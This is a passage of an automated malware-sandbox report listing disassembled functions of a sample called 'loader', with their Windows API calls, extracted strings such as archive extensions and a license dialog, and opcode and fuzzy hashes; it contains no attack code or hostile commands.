                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FreeHeap___free_lconv_mon
                                                                                    • String ID: Memory failed
                                                                                    • API String ID: 358854727-1932948013
                                                                                    • Opcode ID: 49065fc636217472ce2998f3c751b1753727eaf9934a47ff19a5d3173ccf77dd
                                                                                    • Instruction ID: bc69c09b1dfdbcbf1a245411d860f425b89e23b6bbd1c59c1c0ad5a64050562c
                                                                                    • Opcode Fuzzy Hash: 49065fc636217472ce2998f3c751b1753727eaf9934a47ff19a5d3173ccf77dd
                                                                                    • Instruction Fuzzy Hash: CE3162316003099FEB60AA38D846B9A77FBEF50322F10551DE958E7692DF35EC48CB14
                                                                                    APIs
                                                                                      • Part of subcall function 0065C868: _free.LIBCMT ref: 0065C891
                                                                                    • _free.LIBCMT ref: 0065C8F2
                                                                                      • Part of subcall function 00658DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0065C896,00663A34,00000000,00663A34,00000000,?,0065C8BD,00663A34,00000007,00663A34,?,0065CCBA,00663A34), ref: 00658DE2
                                                                                    • _free.LIBCMT ref: 0065C8FD
                                                                                    • _free.LIBCMT ref: 0065C908
                                                                                    • _free.LIBCMT ref: 0065C95C
                                                                                    • _free.LIBCMT ref: 0065C967
                                                                                    • _free.LIBCMT ref: 0065C972
                                                                                    • _free.LIBCMT ref: 0065C97D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FreeHeap
                                                                                    • String ID: $%s:$Memory$SIZE$tectMemory failed$tectMemory failed
                                                                                    • API String ID: 2929853658-882510896
                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                    • Instruction ID: 5fb04634e692543e64b0ce70db9487fe03aafeafd93627a12ab410008695288d
                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                    • Instruction Fuzzy Hash: A0117F71590B08AEE6A0B7B1CC07FCB7BEE9F10B12F400D1CBA9D66093DA64B54D8754
                                                                                    APIs
                                                                                    • GetWindow.USER32(?,00000005), ref: 0064D6C1
                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0064D6ED
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0064D709
                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0064D720
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0064D734
                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0064D75D
                                                                                    • DeleteObject.GDI32(00000000), ref: 0064D764
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0064D76D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                    • String ID: STATIC
                                                                                    • API String ID: 2845197485-1882779555
                                                                                    • Opcode ID: d4bd5767ed16dacb3576fc501d1c29b3ab7a3beaae0dc89e761565d177402ab7
                                                                                    • Instruction ID: ba5ef39c6a02c1c28bd544b0b115b0ecdfe464ccd6ffc047297f8c58bc2c068b
                                                                                    • Opcode Fuzzy Hash: d4bd5767ed16dacb3576fc501d1c29b3ab7a3beaae0dc89e761565d177402ab7
                                                                                    • Instruction Fuzzy Hash: EA1156329403207BE3206FB09C8AFEF765FAF44711F005126FA01E22A1DB64CF0542B9
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00659705
                                                                                      • Part of subcall function 00658DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0065C896,00663A34,00000000,00663A34,00000000,?,0065C8BD,00663A34,00000007,00663A34,?,0065CCBA,00663A34), ref: 00658DE2
                                                                                    • _free.LIBCMT ref: 00659711
                                                                                    • _free.LIBCMT ref: 0065971C
                                                                                    • _free.LIBCMT ref: 00659727
                                                                                    • _free.LIBCMT ref: 00659732
                                                                                    • _free.LIBCMT ref: 0065973D
                                                                                    • _free.LIBCMT ref: 00659748
                                                                                    • _free.LIBCMT ref: 00659753
                                                                                    • _free.LIBCMT ref: 0065975E
                                                                                    • _free.LIBCMT ref: 0065976C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 2929853658-0
                                                                                    • Opcode ID: f65724a2f51340317286317f281be2c7105f4cad817d6c748c509e71723c7e67
                                                                                    • Instruction ID: 133433b0f8baa970511356ca911361c6afc4bcb3ce5012729dd9edc87ef33eba
                                                                                    • Opcode Fuzzy Hash: f65724a2f51340317286317f281be2c7105f4cad817d6c748c509e71723c7e67
                                                                                    • Instruction Fuzzy Hash: 1E11C37610000DAFCB41EF54C842CD93BB6EF14351F0152A9FE089F662DE32DA589B98
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00636FAA
                                                                                    • _wcslen.LIBCMT ref: 00637013
                                                                                    • _wcslen.LIBCMT ref: 00637084
                                                                                      • Part of subcall function 0063A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0063977F,?,?,006395CF,00000000,00662641,000000FF), ref: 0063A1F1
                                                                                      • Part of subcall function 00639DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00639E70
                                                                                      • Part of subcall function 00639620: CloseHandle.KERNELBASE(000000FF,?,?,006395D6,00000000,00662641,000000FF), ref: 0063963B
                                                                                      • Part of subcall function 0063A4ED: SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,0063A325,00000001,006370E6,?,0063A175,?,00000001,00000000,?,?), ref: 0063A501
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$_wcslen$AttributesCloseDeleteH_prologHandleTime
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$SE1$UNC\$\??\
                                                                                    • API String ID: 449284102-102587364
                                                                                    • Opcode ID: a770a1208bdfab836e4629326d82e0b912b849c6866967840b2c9333908d6b82
                                                                                    • Instruction ID: a08c8a5cc6d6f0926eb91fd304a3917e42d08dd4f91edf60c615bb83ee0c03d3
                                                                                    • Opcode Fuzzy Hash: a770a1208bdfab836e4629326d82e0b912b849c6866967840b2c9333908d6b82
                                                                                    • Instruction Fuzzy Hash: F4C10BB1D04614AAEB35DB74DC41FEEB7AEAF04300F00455EF956E7282D770AA48CBA5
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 322700389-393685449
                                                                                    • Opcode ID: 361ac871c2516ec28e52cc1e53b5c9d9a0b13bf8a5bef0e9ff7a74222e5e80a2
                                                                                    • Instruction ID: 7e40cafdecf846c2b55159e00fdf82674a675d9f881cf772b3f9a573d5cc6d6d
                                                                                    • Opcode Fuzzy Hash: 361ac871c2516ec28e52cc1e53b5c9d9a0b13bf8a5bef0e9ff7a74222e5e80a2
                                                                                    • Instruction Fuzzy Hash: 3FB19A3180022AEFCF29DFA4C8919AEB7B6BF05752F14455AEC016B312D731DA1ACB95
                                                                                    APIs
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064B610
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0064B637
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0064B650
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0064B661
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0064B66A
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0064B67E
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0064B694
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                    • String ID: LICENSEDLG
                                                                                    • API String ID: 3214253823-2177901306
                                                                                    • Opcode ID: 3638b543baefe825f0cfea7ddcc59f83269223cec765c03e14e5715a2fc4bb6b
                                                                                    • Instruction ID: 76811e2733106a7cf7c678bb76ae18dbf42e7327310b301606ba33e72a87cb9e
                                                                                    • Opcode Fuzzy Hash: 3638b543baefe825f0cfea7ddcc59f83269223cec765c03e14e5715a2fc4bb6b
                                                                                    • Instruction Fuzzy Hash: 1521F732240225BBD7119F66EC4AF7B3B7FEB46B85F022019F604D66A0CB52DE019735
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nd
                                                                                    • API String ID: 3519838083-3110793395
                                                                                    • Opcode ID: f8fe175e92c2791862f1af1575f2f10a0dd840b6095c3e4b5a529abc77210e6a
                                                                                    • Instruction ID: 9db3a2533b389d31ac683e8c24b6bf4d483c2309927635b321928ce99328cc44
                                                                                    • Opcode Fuzzy Hash: f8fe175e92c2791862f1af1575f2f10a0dd840b6095c3e4b5a529abc77210e6a
                                                                                    • Instruction Fuzzy Hash: D7714E71A00629AFDB14DFA4CC959AFB7BAFF48710F14015DE516A73A0CB70AE42DB90
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00649736
                                                                                    • _wcslen.LIBCMT ref: 006497D6
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0064982D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CreateGlobalStream
                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                    • API String ID: 1938992887-4209811716
                                                                                    • Opcode ID: a8e72c82e617bdaea83afc7580cfe9a49c098682fdacccc18689ca9e244f14c4
                                                                                    • Instruction ID: f47a386db7b617271a8081077fd0a9483dc84bc2ed6448bca03c9723d3c63a52
                                                                                    • Opcode Fuzzy Hash: a8e72c82e617bdaea83afc7580cfe9a49c098682fdacccc18689ca9e244f14c4
                                                                                    • Instruction Fuzzy Hash: 933148325483117ED725AF249C06FAB7B9E9F43721F14051EF802962D2EF609A0983BA
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: Ud$pd$zd
                                                                                    • API String ID: 176396367-3915611454
                                                                                    • Opcode ID: a07dae50d0d7cb3a811be493124abf2281faa4ff55bf2fdc20295570a21d613f
                                                                                    • Instruction ID: b25e27db4d39c34dcb312030a009b722d7b411e2d644723572ab507ff3ca424f
                                                                                    • Opcode Fuzzy Hash: a07dae50d0d7cb3a811be493124abf2281faa4ff55bf2fdc20295570a21d613f
                                                                                    • Instruction Fuzzy Hash: A241B3719006699BCB619F688C0A9EF7BBDEF01311F00002EFD46E7345DE30AE498AE4
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00649EEE
                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00649F44
                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00649FDB
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00649FE3
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00649FF9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$RectText
                                                                                    • String ID: d$RarHtmlClassName
                                                                                    • API String ID: 3937224194-1757021614
                                                                                    • Opcode ID: 7289af701e0488d0f53d3d6017d41eab85de58d3c0a8e1566b2156c23175948f
                                                                                    • Instruction ID: 9655929f323d7075787537863544c91c3f8d947e6a3cd28775b5f5cdf35457be
                                                                                    • Opcode Fuzzy Hash: 7289af701e0488d0f53d3d6017d41eab85de58d3c0a8e1566b2156c23175948f
                                                                                    • Instruction Fuzzy Hash: 1541B131048320EFCB615FA4EC49B6B7BAAFF49705F00455AF8499A266CB34D909CB66
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 00632536
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                      • Part of subcall function 006405DA: _wcslen.LIBCMT ref: 006405E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                    • API String ID: 3053425827-2277559157
                                                                                    • Opcode ID: 99dfe9f531ec0694521f299d8861214ca23b20da605cb0bb15eed938a214bb0c
                                                                                    • Instruction ID: 31acfa59e027b18b4b8ef824d19f3f9680bd8b0d30348394db8e6492342f67ad
                                                                                    • Opcode Fuzzy Hash: 99dfe9f531ec0694521f299d8861214ca23b20da605cb0bb15eed938a214bb0c
                                                                                    • Instruction Fuzzy Hash: 8FF1F7706083419BDB15DB2888A5BFE77DB6F91300F08056DFD86AB383CB649949C7E6
                                                                                    APIs
                                                                                      • Part of subcall function 0064A699: GetDC.USER32(00000000), ref: 0064A69D
                                                                                      • Part of subcall function 0064A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0064A6A8
                                                                                      • Part of subcall function 0064A699: ReleaseDC.USER32(00000000,00000000), ref: 0064A6B3
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0064A83C
                                                                                      • Part of subcall function 0064AAC9: GetDC.USER32(00000000), ref: 0064AAD2
                                                                                      • Part of subcall function 0064AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0064AB01
                                                                                      • Part of subcall function 0064AAC9: ReleaseDC.USER32(00000000,?), ref: 0064AB99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                    • String ID: "d$($Ad$lUf
                                                                                    • API String ID: 1061551593-3154586099
                                                                                    • Opcode ID: 6b1ba84a56e58b5529a796954c564ab7ff1b8eb4011843fe869df0ad2c7e29c0
                                                                                    • Instruction ID: 834e7f2313b1707ad89ff7ec6c05e0845becba8ea2bb03f853e123ab8e8c1d54
                                                                                    • Opcode Fuzzy Hash: 6b1ba84a56e58b5529a796954c564ab7ff1b8eb4011843fe869df0ad2c7e29c0
                                                                                    • Instruction Fuzzy Hash: FB91E071608354AFD710DF65C854A6BBBFAFF88700F00591EF59AD3260DB70AA46CB62
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                    • API String ID: 176396367-3568243669
                                                                                    • Opcode ID: 226b6a78aacfbd22f2a18c742261ec492f7aa19de2d46c0d59b3f1aeb148a402
                                                                                    • Instruction ID: c55946c4c020ee4141e1f60c4a58772fa2a84139b9feb8ed6a0803422bcde424
                                                                                    • Opcode Fuzzy Hash: 226b6a78aacfbd22f2a18c742261ec492f7aa19de2d46c0d59b3f1aeb148a402
                                                                                    • Instruction Fuzzy Hash: 6351F766BC072395DB34AA659811BF773E3DFA1790F69042AF9C18B3C0FB658C818275
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00652937
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0065293F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 006529C8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 006529F3
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00652A48
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: 69a3909d4cdd450d4826000630f4ff31296aa8ace3a40d63b0a83cb2b5629ac9
                                                                                    • Instruction ID: ea27628494ac5957f99d46c90064c91a222d28663c1397612d7201975dcf7bc7
                                                                                    • Opcode Fuzzy Hash: 69a3909d4cdd450d4826000630f4ff31296aa8ace3a40d63b0a83cb2b5629ac9
                                                                                    • Instruction Fuzzy Hash: 64410634A0021AAFCF10DF69C891ADE7BB2EF45325F148159EC156B392D771DA09CF90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                    • API String ID: 176396367-3743748572
                                                                                    • Opcode ID: f9aee7bad32b14f8ed5ff6356a1a5187b3cad849cc0b4c33c756a88708a8759b
                                                                                    • Instruction ID: ef9559074dca2d11c0a0b088a626925dcda191cc52832c19032ddbd4320f635d
                                                                                    • Opcode Fuzzy Hash: f9aee7bad32b14f8ed5ff6356a1a5187b3cad849cc0b4c33c756a88708a8759b
                                                                                    • Instruction Fuzzy Hash: 6E310A326843455ADB34AB549C42BB773A6EB50720F54441FF88697380FB50ADC983B5
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0064AAD2
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0064AB01
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0064AB99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease
                                                                                    • String ID: -d$7d$d
                                                                                    • API String ID: 1429681911-2951457888
                                                                                    • Opcode ID: 9e062a8342086c3c1f652eff8ea1378270e996587c64415f489d9b1e9935cf52
                                                                                    • Instruction ID: 10d2a980f8ddad9cc50c434ed58772d1feb09543770a4d7c1a3ba97feab9ae0f
                                                                                    • Opcode Fuzzy Hash: 9e062a8342086c3c1f652eff8ea1378270e996587c64415f489d9b1e9935cf52
                                                                                    • Instruction Fuzzy Hash: 7B212872108314BFD3019FA5DC48E6FBFEEFB89355F04192AFA46D2620D7319A548B62
                                                                                    APIs
                                                                                      • Part of subcall function 006405DA: _wcslen.LIBCMT ref: 006405E0
                                                                                      • Part of subcall function 0063B92D: _wcsrchr.LIBVCRUNTIME ref: 0063B944
                                                                                    • _wcslen.LIBCMT ref: 0063C197
                                                                                    • _wcslen.LIBCMT ref: 0063C1DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                    • String ID: .exe$.rar$.sfx
                                                                                    • API String ID: 3513545583-31770016
